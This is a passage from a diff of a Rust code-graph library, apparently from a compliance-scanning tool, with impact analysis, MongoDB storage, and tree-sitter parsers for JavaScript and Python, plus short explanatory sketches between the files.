graph.add_edge(src, tgt, edge.kind.clone());
resolved_edges.push(edge);
}
// Skip unresolved edges (cross-file, external deps) — conservative approach
}
Ok(CodeGraph {
graph,
node_map,
nodes,
edges: resolved_edges,
})
}
/// Try to resolve an edge target to a known node
fn resolve_edge_target<'a>(
&self,
target: &str,
node_map: &'a HashMap<String, NodeIndex>,
) -> Option<NodeIndex> {
// Direct match
if let Some(idx) = node_map.get(target) {
return Some(*idx);
}
        // Fall back to a suffix match on the bare function/type name
for (qualified, idx) in node_map {
// Match "foo" to "path/file.rs::foo" or "path/file.rs::Type::foo"
if qualified.ends_with(&format!("::{target}"))
|| qualified.ends_with(&format!(".{target}"))
{
return Some(*idx);
}
}
// Try matching method calls like "self.method" -> look for "::method"
if let Some(method_name) = target.strip_prefix("self.") {
for (qualified, idx) in node_map {
if qualified.ends_with(&format!("::{method_name}"))
|| qualified.ends_with(&format!(".{method_name}"))
{
return Some(*idx);
}
}
}
None
}
/// Get the impact analyzer for a built graph
pub fn impact_analyzer(code_graph: &CodeGraph) -> ImpactAnalyzer<'_> {
ImpactAnalyzer::new(code_graph)
}
}
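The resolution strategy in `resolve_edge_target` is a cascade: exact qualified-name match first, then suffix matches on the bare name, then the same with a leading `self.` stripped. A condensed standalone sketch (the symbol table here maps qualified names to plain indices instead of petgraph `NodeIndex` values):

```rust
use std::collections::HashMap;

// Suffix-based symbol resolution, as in resolve_edge_target: exact match,
// then "::name" / ".name" suffix match, with a leading "self." stripped.
fn resolve(target: &str, symbols: &HashMap<String, u32>) -> Option<u32> {
    if let Some(&idx) = symbols.get(target) {
        return Some(idx);
    }
    let bare = target.strip_prefix("self.").unwrap_or(target);
    symbols
        .iter()
        .find(|(qualified, _)| {
            qualified.ends_with(&format!("::{bare}")) || qualified.ends_with(&format!(".{bare}"))
        })
        .map(|(_, &idx)| idx)
}
```

Because the fallback scans the whole table, an ambiguous bare name resolves to an arbitrary candidate; the engine accepts that trade-off and drops edges it cannot resolve at all.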

View File

@@ -0,0 +1,219 @@
use std::collections::{HashSet, VecDeque};
use compliance_core::models::graph::ImpactAnalysis;
use petgraph::graph::NodeIndex;
use petgraph::visit::EdgeRef;
use petgraph::Direction;
use super::engine::CodeGraph;
/// Analyzes the impact/blast radius of findings within a code graph
pub struct ImpactAnalyzer<'a> {
code_graph: &'a CodeGraph,
}
impl<'a> ImpactAnalyzer<'a> {
pub fn new(code_graph: &'a CodeGraph) -> Self {
Self { code_graph }
}
/// Compute impact analysis for a finding at the given file path and line number
pub fn analyze(
&self,
repo_id: &str,
finding_id: &str,
graph_build_id: &str,
file_path: &str,
line_number: Option<u32>,
) -> ImpactAnalysis {
let mut analysis =
ImpactAnalysis::new(repo_id.to_string(), finding_id.to_string(), graph_build_id.to_string());
// Find the node containing the finding
let target_node = self.find_node_at_location(file_path, line_number);
let target_idx = match target_node {
Some(idx) => idx,
None => return analysis,
};
// BFS forward: compute blast radius (what this node affects)
let forward_reachable = self.bfs_reachable(target_idx, Direction::Outgoing);
analysis.blast_radius = forward_reachable.len() as u32;
// BFS backward: find entry points that reach this node
let backward_reachable = self.bfs_reachable(target_idx, Direction::Incoming);
// Find affected entry points
for &idx in &backward_reachable {
if let Some(node) = self.get_node_by_index(idx) {
if node.is_entry_point {
analysis
.affected_entry_points
.push(node.qualified_name.clone());
}
}
}
// Extract call chains from entry points to the target (limited depth)
        for entry_name in analysis.affected_entry_points.clone() {
            if let Some(&entry_idx) = self.code_graph.node_map.get(&entry_name) {
if let Some(chain) = self.find_path(entry_idx, target_idx, 10) {
analysis.call_chains.push(chain);
}
}
}
// Direct callers (incoming edges to target)
for edge in self
.code_graph
.graph
.edges_directed(target_idx, Direction::Incoming)
{
if let Some(node) = self.get_node_by_index(edge.source()) {
analysis.direct_callers.push(node.qualified_name.clone());
}
}
// Direct callees (outgoing edges from target)
for edge in self.code_graph.graph.edges(target_idx) {
if let Some(node) = self.get_node_by_index(edge.target()) {
analysis.direct_callees.push(node.qualified_name.clone());
}
}
// Affected communities
let mut affected_comms: HashSet<u32> = HashSet::new();
for &idx in forward_reachable.iter().chain(std::iter::once(&target_idx)) {
if let Some(node) = self.get_node_by_index(idx) {
if let Some(cid) = node.community_id {
affected_comms.insert(cid);
}
}
}
analysis.affected_communities = affected_comms.into_iter().collect();
analysis.affected_communities.sort();
analysis
}
/// Find the graph node at a given file/line location
fn find_node_at_location(&self, file_path: &str, line_number: Option<u32>) -> Option<NodeIndex> {
let mut best: Option<(NodeIndex, u32)> = None; // (index, line_span)
for node in &self.code_graph.nodes {
if node.file_path != file_path {
continue;
}
if let Some(line) = line_number {
if line >= node.start_line && line <= node.end_line {
let span = node.end_line - node.start_line;
// Prefer the narrowest containing node
                    if best.map_or(true, |(_, best_span)| span < best_span) {
if let Some(gi) = node.graph_index {
best = Some((NodeIndex::new(gi as usize), span));
}
}
}
} else {
// No line number, use file node
if node.kind == compliance_core::models::graph::CodeNodeKind::File {
if let Some(gi) = node.graph_index {
return Some(NodeIndex::new(gi as usize));
}
}
}
}
best.map(|(idx, _)| idx)
}
/// BFS to find all reachable nodes in a given direction
fn bfs_reachable(&self, start: NodeIndex, direction: Direction) -> HashSet<NodeIndex> {
let mut visited = HashSet::new();
let mut queue = VecDeque::new();
queue.push_back(start);
while let Some(current) = queue.pop_front() {
if !visited.insert(current) {
continue;
}
let neighbors: Vec<NodeIndex> = match direction {
Direction::Outgoing => self
.code_graph
.graph
.edges(current)
.map(|e| e.target())
.collect(),
Direction::Incoming => self
.code_graph
.graph
.edges_directed(current, Direction::Incoming)
.map(|e| e.source())
.collect(),
};
for neighbor in neighbors {
if !visited.contains(&neighbor) {
queue.push_back(neighbor);
}
}
}
visited.remove(&start);
visited
}
/// Find a path from source to target (BFS, limited depth)
fn find_path(
&self,
from: NodeIndex,
to: NodeIndex,
max_depth: usize,
) -> Option<Vec<String>> {
let mut visited = HashSet::new();
let mut queue: VecDeque<(NodeIndex, Vec<NodeIndex>)> = VecDeque::new();
queue.push_back((from, vec![from]));
while let Some((current, path)) = queue.pop_front() {
if current == to {
return Some(
path.iter()
.filter_map(|&idx| {
self.get_node_by_index(idx)
.map(|n| n.qualified_name.clone())
})
.collect(),
);
}
if path.len() >= max_depth {
continue;
}
if !visited.insert(current) {
continue;
}
for edge in self.code_graph.graph.edges(current) {
let next = edge.target();
if !visited.contains(&next) {
let mut new_path = path.clone();
new_path.push(next);
queue.push_back((next, new_path));
}
}
}
None
}
fn get_node_by_index(&self, idx: NodeIndex) -> Option<&compliance_core::models::graph::CodeNode> {
let target_gi = idx.index() as u32;
self.code_graph
.nodes
.iter()
.find(|n| n.graph_index == Some(target_gi))
}
}
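The blast-radius computation is a plain BFS over the call graph, excluding the start node itself. The same logic on a bare adjacency list, decoupled from petgraph:

```rust
use std::collections::{HashMap, HashSet, VecDeque};

// BFS over a directed call graph, as in bfs_reachable: every node
// reachable from `start` (excluding `start` itself) is in the blast radius.
fn blast_radius(edges: &HashMap<u32, Vec<u32>>, start: u32) -> HashSet<u32> {
    let mut visited = HashSet::new();
    let mut queue = VecDeque::from([start]);
    while let Some(current) = queue.pop_front() {
        // insert returns false if already visited, which also breaks cycles
        if !visited.insert(current) {
            continue;
        }
        for &next in edges.get(&current).into_iter().flatten() {
            if !visited.contains(&next) {
                queue.push_back(next);
            }
        }
    }
    visited.remove(&start);
    visited
}
```

Running the same traversal over reversed edges yields the backward-reachable set used to find affected entry points.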

View File

@@ -0,0 +1,4 @@
pub mod community;
pub mod engine;
pub mod impact;
pub mod persistence;

View File

@@ -0,0 +1,255 @@
use compliance_core::error::CoreError;
use compliance_core::models::graph::{CodeEdge, CodeNode, GraphBuildRun, ImpactAnalysis};
use futures_util::TryStreamExt;
use mongodb::bson::doc;
use mongodb::options::IndexOptions;
use mongodb::{Collection, Database, IndexModel};
use tracing::info;
/// MongoDB persistence layer for the code knowledge graph
pub struct GraphStore {
nodes: Collection<CodeNode>,
edges: Collection<CodeEdge>,
builds: Collection<GraphBuildRun>,
impacts: Collection<ImpactAnalysis>,
}
impl GraphStore {
pub fn new(db: &Database) -> Self {
Self {
nodes: db.collection("graph_nodes"),
edges: db.collection("graph_edges"),
builds: db.collection("graph_builds"),
impacts: db.collection("impact_analyses"),
}
}
/// Ensure indexes are created
pub async fn ensure_indexes(&self) -> Result<(), CoreError> {
// graph_nodes: compound index on (repo_id, graph_build_id)
self.nodes
.create_index(
IndexModel::builder()
.keys(doc! { "repo_id": 1, "graph_build_id": 1 })
.build(),
)
.await?;
// graph_nodes: index on qualified_name for lookups
self.nodes
.create_index(
IndexModel::builder()
.keys(doc! { "qualified_name": 1 })
.build(),
)
.await?;
// graph_edges: compound index on (repo_id, graph_build_id)
self.edges
.create_index(
IndexModel::builder()
.keys(doc! { "repo_id": 1, "graph_build_id": 1 })
.build(),
)
.await?;
// graph_builds: compound index on (repo_id, started_at DESC)
self.builds
.create_index(
IndexModel::builder()
.keys(doc! { "repo_id": 1, "started_at": -1 })
.build(),
)
.await?;
// impact_analyses: compound index on (repo_id, finding_id)
self.impacts
.create_index(
IndexModel::builder()
.keys(doc! { "repo_id": 1, "finding_id": 1 })
.options(IndexOptions::builder().unique(true).build())
.build(),
)
.await?;
Ok(())
}
/// Store a complete graph build result
pub async fn store_graph(
&self,
build_run: &GraphBuildRun,
nodes: &[CodeNode],
edges: &[CodeEdge],
) -> Result<String, CoreError> {
// Insert the build run
let result = self.builds.insert_one(build_run).await?;
let build_id = result
.inserted_id
.as_object_id()
.map(|oid| oid.to_hex())
.unwrap_or_default();
        // Insert nodes and edges in batches to keep each payload bounded
        const BATCH_SIZE: usize = 1000;
        if !nodes.is_empty() {
            for chunk in nodes.chunks(BATCH_SIZE) {
                self.nodes.insert_many(chunk.to_vec()).await?;
            }
        }
        if !edges.is_empty() {
            for chunk in edges.chunks(BATCH_SIZE) {
                self.edges.insert_many(chunk.to_vec()).await?;
            }
        }
info!(
build_id = %build_id,
nodes = nodes.len(),
edges = edges.len(),
"Graph stored to MongoDB"
);
Ok(build_id)
}
/// Delete previous graph data for a repo before storing new graph
pub async fn delete_repo_graph(&self, repo_id: &str) -> Result<(), CoreError> {
let filter = doc! { "repo_id": repo_id };
self.nodes.delete_many(filter.clone()).await?;
self.edges.delete_many(filter.clone()).await?;
self.impacts.delete_many(filter).await?;
Ok(())
}
/// Store an impact analysis result
pub async fn store_impact(&self, impact: &ImpactAnalysis) -> Result<(), CoreError> {
let filter = doc! {
"repo_id": &impact.repo_id,
"finding_id": &impact.finding_id,
};
let opts = mongodb::options::ReplaceOptions::builder()
.upsert(true)
.build();
self.impacts
.replace_one(filter, impact)
.with_options(opts)
.await?;
Ok(())
}
/// Get the latest graph build for a repo
pub async fn get_latest_build(
&self,
repo_id: &str,
) -> Result<Option<GraphBuildRun>, CoreError> {
let filter = doc! { "repo_id": repo_id };
let opts = mongodb::options::FindOneOptions::builder()
.sort(doc! { "started_at": -1 })
.build();
let result = self.builds.find_one(filter).with_options(opts).await?;
Ok(result)
}
    /// Get all nodes for a given graph build of a repo
pub async fn get_nodes(
&self,
repo_id: &str,
graph_build_id: &str,
) -> Result<Vec<CodeNode>, CoreError> {
let filter = doc! {
"repo_id": repo_id,
"graph_build_id": graph_build_id,
};
let cursor = self.nodes.find(filter).await?;
let nodes: Vec<CodeNode> = cursor.try_collect().await?;
Ok(nodes)
}
    /// Get all edges for a given graph build of a repo
pub async fn get_edges(
&self,
repo_id: &str,
graph_build_id: &str,
) -> Result<Vec<CodeEdge>, CoreError> {
let filter = doc! {
"repo_id": repo_id,
"graph_build_id": graph_build_id,
};
let cursor = self.edges.find(filter).await?;
let edges: Vec<CodeEdge> = cursor.try_collect().await?;
Ok(edges)
}
/// Get impact analysis for a finding
pub async fn get_impact(
&self,
repo_id: &str,
finding_id: &str,
) -> Result<Option<ImpactAnalysis>, CoreError> {
let filter = doc! {
"repo_id": repo_id,
"finding_id": finding_id,
};
let result = self.impacts.find_one(filter).await?;
Ok(result)
}
/// Get nodes grouped by community
pub async fn get_communities(
&self,
repo_id: &str,
graph_build_id: &str,
) -> Result<Vec<CommunityInfo>, CoreError> {
let filter = doc! {
"repo_id": repo_id,
"graph_build_id": graph_build_id,
};
let cursor = self.nodes.find(filter).await?;
let nodes: Vec<CodeNode> = cursor.try_collect().await?;
let mut communities: std::collections::HashMap<u32, Vec<String>> =
std::collections::HashMap::new();
for node in &nodes {
if let Some(cid) = node.community_id {
communities
.entry(cid)
.or_default()
.push(node.qualified_name.clone());
}
}
let mut result: Vec<CommunityInfo> = communities
.into_iter()
.map(|(id, members)| CommunityInfo {
community_id: id,
member_count: members.len() as u32,
members,
})
.collect();
result.sort_by_key(|c| c.community_id);
Ok(result)
}
}
#[derive(Debug, Clone, serde::Serialize, serde::Deserialize)]
pub struct CommunityInfo {
pub community_id: u32,
pub member_count: u32,
pub members: Vec<String>,
}
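The batching in `store_graph` is just `slice::chunks` driving one `insert_many` per batch. With a plain `Vec` standing in for the MongoDB collection, the batching logic is testable in isolation:

```rust
// Chunked writes, as in store_graph: one "insert_many" per fixed-size
// batch keeps each payload bounded. The sink Vec stands in for a
// mongodb::Collection so the logic runs without a database.
fn insert_in_batches<T: Clone>(sink: &mut Vec<Vec<T>>, items: &[T], batch_size: usize) {
    for chunk in items.chunks(batch_size) {
        sink.push(chunk.to_vec()); // one insert call per chunk
    }
}
```

`chunks` yields a final short batch for the remainder, so no length check is needed beyond skipping an empty input.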

View File

@@ -0,0 +1,7 @@
pub mod graph;
pub mod parsers;
pub mod search;
pub use graph::engine::GraphEngine;
pub use parsers::registry::ParserRegistry;
pub use search::index::SymbolIndex;

View File

@@ -0,0 +1,372 @@
use std::path::Path;
use compliance_core::error::CoreError;
use compliance_core::models::graph::{CodeEdge, CodeEdgeKind, CodeNode, CodeNodeKind};
use compliance_core::traits::graph_builder::{LanguageParser, ParseOutput};
use tree_sitter::{Node, Parser};
pub struct JavaScriptParser;
impl JavaScriptParser {
pub fn new() -> Self {
Self
}
fn walk_tree(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
parent_qualified: Option<&str>,
output: &mut ParseOutput,
) {
match node.kind() {
"function_declaration" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
let is_entry = self.is_exported_function(&node, source);
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Function,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "javascript".to_string(),
community_id: None,
is_entry_point: is_entry,
graph_index: None,
});
if let Some(body) = node.child_by_field_name("body") {
self.extract_calls(
body, source, file_path, repo_id, graph_build_id, &qualified, output,
);
}
}
}
"class_declaration" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Class,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "javascript".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
// Extract superclass
if let Some(heritage) = node.child_by_field_name("superclass") {
let base_name = &source[heritage.byte_range()];
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: qualified.clone(),
target: base_name.to_string(),
kind: CodeEdgeKind::Inherits,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
if let Some(body) = node.child_by_field_name("body") {
self.walk_children(
body, source, file_path, repo_id, graph_build_id, Some(&qualified),
output,
);
}
return;
}
}
"method_definition" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Method,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "javascript".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
if let Some(body) = node.child_by_field_name("body") {
self.extract_calls(
body, source, file_path, repo_id, graph_build_id, &qualified, output,
);
}
}
}
// Arrow functions assigned to variables: const foo = () => {}
"lexical_declaration" | "variable_declaration" => {
self.extract_arrow_functions(
node, source, file_path, repo_id, graph_build_id, parent_qualified, output,
);
}
"import_statement" => {
let text = &source[node.byte_range()];
if let Some(module) = self.extract_import_source(text) {
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: parent_qualified.unwrap_or(file_path).to_string(),
target: module,
kind: CodeEdgeKind::Imports,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
}
_ => {}
}
self.walk_children(
node,
source,
file_path,
repo_id,
graph_build_id,
parent_qualified,
output,
);
}
fn walk_children(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
parent_qualified: Option<&str>,
output: &mut ParseOutput,
) {
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
self.walk_tree(
child, source, file_path, repo_id, graph_build_id, parent_qualified, output,
);
}
}
fn extract_calls(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
caller_qualified: &str,
output: &mut ParseOutput,
) {
if node.kind() == "call_expression" {
if let Some(func_node) = node.child_by_field_name("function") {
let callee = &source[func_node.byte_range()];
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: caller_qualified.to_string(),
target: callee.to_string(),
kind: CodeEdgeKind::Calls,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
}
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
self.extract_calls(
child, source, file_path, repo_id, graph_build_id, caller_qualified, output,
);
}
}
fn extract_arrow_functions(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
parent_qualified: Option<&str>,
output: &mut ParseOutput,
) {
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
if child.kind() == "variable_declarator" {
let name_node = child.child_by_field_name("name");
let value_node = child.child_by_field_name("value");
if let (Some(name_n), Some(value_n)) = (name_node, value_node) {
if value_n.kind() == "arrow_function" || value_n.kind() == "function" {
let name = &source[name_n.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Function,
file_path: file_path.to_string(),
start_line: child.start_position().row as u32 + 1,
end_line: child.end_position().row as u32 + 1,
language: "javascript".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
if let Some(body) = value_n.child_by_field_name("body") {
self.extract_calls(
body, source, file_path, repo_id, graph_build_id, &qualified,
output,
);
}
}
}
}
}
}
fn is_exported_function(&self, node: &Node<'_>, source: &str) -> bool {
if let Some(parent) = node.parent() {
if parent.kind() == "export_statement" {
return true;
}
}
// Check for module.exports patterns
if let Some(prev) = node.prev_sibling() {
let text = &source[prev.byte_range()];
if text.contains("module.exports") || text.contains("exports.") {
return true;
}
}
false
}
fn extract_import_source(&self, import_text: &str) -> Option<String> {
// import ... from 'module' or import 'module'
let from_idx = import_text.find("from ");
let start = if let Some(idx) = from_idx {
idx + 5
} else {
import_text.find("import ")? + 7
};
let rest = &import_text[start..];
let module = rest
.trim()
.trim_matches(|c| c == '\'' || c == '"' || c == ';' || c == ' ');
if module.is_empty() {
None
} else {
Some(module.to_string())
}
}
}
impl LanguageParser for JavaScriptParser {
fn language(&self) -> &str {
"javascript"
}
fn extensions(&self) -> &[&str] {
&["js", "jsx", "mjs", "cjs"]
}
fn parse_file(
&self,
file_path: &Path,
source: &str,
repo_id: &str,
graph_build_id: &str,
) -> Result<ParseOutput, CoreError> {
let mut parser = Parser::new();
let language = tree_sitter_javascript::LANGUAGE;
parser
.set_language(&language.into())
.map_err(|e| CoreError::Graph(format!("Failed to set JavaScript language: {e}")))?;
let tree = parser
.parse(source, None)
.ok_or_else(|| CoreError::Graph("Failed to parse JavaScript file".to_string()))?;
let file_path_str = file_path.to_string_lossy().to_string();
let mut output = ParseOutput::default();
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: file_path_str.clone(),
name: file_path
.file_name()
.map(|n| n.to_string_lossy().to_string())
.unwrap_or_default(),
kind: CodeNodeKind::File,
file_path: file_path_str.clone(),
start_line: 1,
end_line: source.lines().count() as u32,
language: "javascript".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
self.walk_tree(
tree.root_node(),
source,
&file_path_str,
repo_id,
graph_build_id,
None,
&mut output,
);
Ok(output)
}
}
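The import-source extraction above is plain string slicing over the `import_statement` node text. A standalone sketch of that logic (a hypothetical free function mirroring `JavaScriptParser::extract_import_source`, not part of the crate):

```rust
// Sketch of the JS import-source extraction: handles both
// "import x from 'module'" and bare "import 'module'" forms.
fn extract_import_source(import_text: &str) -> Option<String> {
    let start = match import_text.find("from ") {
        Some(idx) => idx + 5,              // skip past "from "
        None => import_text.find("import ")? + 7, // bare import form
    };
    let module = import_text[start..]
        .trim()
        .trim_matches(|c| c == '\'' || c == '"' || c == ';' || c == ' ');
    (!module.is_empty()).then(|| module.to_string())
}

fn main() {
    assert_eq!(
        extract_import_source("import { x } from 'lodash';").as_deref(),
        Some("lodash")
    );
    assert_eq!(
        extract_import_source("import './styles.css';").as_deref(),
        Some("./styles.css")
    );
    assert_eq!(extract_import_source("const x = 1;"), None);
    println!("ok");
}
```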

View File

@@ -0,0 +1,5 @@
pub mod javascript;
pub mod python;
pub mod registry;
pub mod rust_parser;
pub mod typescript;

View File

@@ -0,0 +1,336 @@
use std::path::Path;
use compliance_core::error::CoreError;
use compliance_core::models::graph::{CodeEdge, CodeEdgeKind, CodeNode, CodeNodeKind};
use compliance_core::traits::graph_builder::{LanguageParser, ParseOutput};
use tree_sitter::{Node, Parser};
pub struct PythonParser;
impl PythonParser {
pub fn new() -> Self {
Self
}
fn walk_tree(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
parent_qualified: Option<&str>,
output: &mut ParseOutput,
) {
match node.kind() {
"function_definition" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
                    // A function nested directly inside a class body is a method:
                    // function_definition -> block -> class_definition
                    let is_method = node
                        .parent()
                        .and_then(|p| p.parent())
                        .map(|gp| gp.kind() == "class_definition")
                        .unwrap_or(false);
let kind = if is_method {
CodeNodeKind::Method
} else {
CodeNodeKind::Function
};
let is_entry = name == "__main__"
|| name == "main"
|| self.has_decorator(&node, source, "app.route")
|| self.has_decorator(&node, source, "app.get")
|| self.has_decorator(&node, source, "app.post");
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "python".to_string(),
community_id: None,
is_entry_point: is_entry,
graph_index: None,
});
// Extract calls in function body
if let Some(body) = node.child_by_field_name("body") {
self.extract_calls(
body,
source,
file_path,
repo_id,
graph_build_id,
&qualified,
output,
);
}
}
}
"class_definition" => {
if let Some(name_node) = node.child_by_field_name("name") {
let name = &source[name_node.byte_range()];
let qualified = match parent_qualified {
Some(p) => format!("{p}.{name}"),
None => format!("{file_path}::{name}"),
};
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: qualified.clone(),
name: name.to_string(),
kind: CodeNodeKind::Class,
file_path: file_path.to_string(),
start_line: node.start_position().row as u32 + 1,
end_line: node.end_position().row as u32 + 1,
language: "python".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
// Extract superclasses
if let Some(bases) = node.child_by_field_name("superclasses") {
self.extract_inheritance(
bases,
source,
file_path,
repo_id,
graph_build_id,
&qualified,
output,
);
}
// Walk methods
if let Some(body) = node.child_by_field_name("body") {
self.walk_children(
body,
source,
file_path,
repo_id,
graph_build_id,
Some(&qualified),
output,
);
}
return;
}
}
"import_statement" | "import_from_statement" => {
let import_text = &source[node.byte_range()];
if let Some(module) = self.extract_import_module(import_text) {
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: parent_qualified.unwrap_or(file_path).to_string(),
target: module,
kind: CodeEdgeKind::Imports,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
}
_ => {}
}
self.walk_children(
node,
source,
file_path,
repo_id,
graph_build_id,
parent_qualified,
output,
);
}
fn walk_children(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
parent_qualified: Option<&str>,
output: &mut ParseOutput,
) {
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
self.walk_tree(
child,
source,
file_path,
repo_id,
graph_build_id,
parent_qualified,
output,
);
}
}
fn extract_calls(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
caller_qualified: &str,
output: &mut ParseOutput,
) {
if node.kind() == "call" {
if let Some(func_node) = node.child_by_field_name("function") {
let callee = &source[func_node.byte_range()];
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: caller_qualified.to_string(),
target: callee.to_string(),
kind: CodeEdgeKind::Calls,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
}
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
self.extract_calls(
child,
source,
file_path,
repo_id,
graph_build_id,
caller_qualified,
output,
);
}
}
fn extract_inheritance(
&self,
node: Node<'_>,
source: &str,
file_path: &str,
repo_id: &str,
graph_build_id: &str,
class_qualified: &str,
output: &mut ParseOutput,
) {
let mut cursor = node.walk();
for child in node.children(&mut cursor) {
if child.kind() == "identifier" || child.kind() == "attribute" {
let base_name = &source[child.byte_range()];
output.edges.push(CodeEdge {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
source: class_qualified.to_string(),
target: base_name.to_string(),
kind: CodeEdgeKind::Inherits,
file_path: file_path.to_string(),
line_number: Some(node.start_position().row as u32 + 1),
});
}
}
}
fn has_decorator(&self, node: &Node<'_>, source: &str, decorator_name: &str) -> bool {
if let Some(prev) = node.prev_sibling() {
if prev.kind() == "decorator" {
let text = &source[prev.byte_range()];
return text.contains(decorator_name);
}
}
false
}
    fn extract_import_module(&self, import_text: &str) -> Option<String> {
        if let Some(rest) = import_text.strip_prefix("from ") {
            // "from foo.bar import baz" -> "foo.bar"
            let module = rest.split_whitespace().next()?;
            Some(module.to_string())
        } else if let Some(rest) = import_text.strip_prefix("import ") {
            // "import foo.bar as fb" -> "foo.bar" (first module only,
            // so aliases and comma-separated imports don't leak into the name)
            let module = rest.split_whitespace().next()?.trim_matches(',');
            Some(module.to_string())
        } else {
            None
        }
    }
}
impl LanguageParser for PythonParser {
fn language(&self) -> &str {
"python"
}
fn extensions(&self) -> &[&str] {
&["py"]
}
fn parse_file(
&self,
file_path: &Path,
source: &str,
repo_id: &str,
graph_build_id: &str,
) -> Result<ParseOutput, CoreError> {
let mut parser = Parser::new();
let language = tree_sitter_python::LANGUAGE;
parser
.set_language(&language.into())
.map_err(|e| CoreError::Graph(format!("Failed to set Python language: {e}")))?;
let tree = parser
.parse(source, None)
.ok_or_else(|| CoreError::Graph("Failed to parse Python file".to_string()))?;
let file_path_str = file_path.to_string_lossy().to_string();
let mut output = ParseOutput::default();
output.nodes.push(CodeNode {
id: None,
repo_id: repo_id.to_string(),
graph_build_id: graph_build_id.to_string(),
qualified_name: file_path_str.clone(),
name: file_path
.file_name()
.map(|n| n.to_string_lossy().to_string())
.unwrap_or_default(),
kind: CodeNodeKind::File,
file_path: file_path_str.clone(),
start_line: 1,
end_line: source.lines().count() as u32,
language: "python".to_string(),
community_id: None,
is_entry_point: false,
graph_index: None,
});
self.walk_tree(
tree.root_node(),
source,
&file_path_str,
repo_id,
graph_build_id,
None,
&mut output,
);
Ok(output)
}
}
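The Python import extraction reduces an `import_statement` to its leading module path. A standalone sketch of that reduction (a hypothetical free function mirroring `PythonParser::extract_import_module`):

```rust
// Sketch of the Python import-module extraction: takes the first
// whitespace-separated token so aliases ("as np") are dropped.
fn extract_import_module(import_text: &str) -> Option<String> {
    if let Some(rest) = import_text.strip_prefix("from ") {
        // "from foo.bar import baz" -> "foo.bar"
        Some(rest.split_whitespace().next()?.to_string())
    } else if let Some(rest) = import_text.strip_prefix("import ") {
        // "import numpy as np" -> "numpy"
        Some(rest.split_whitespace().next()?.trim_matches(',').to_string())
    } else {
        None
    }
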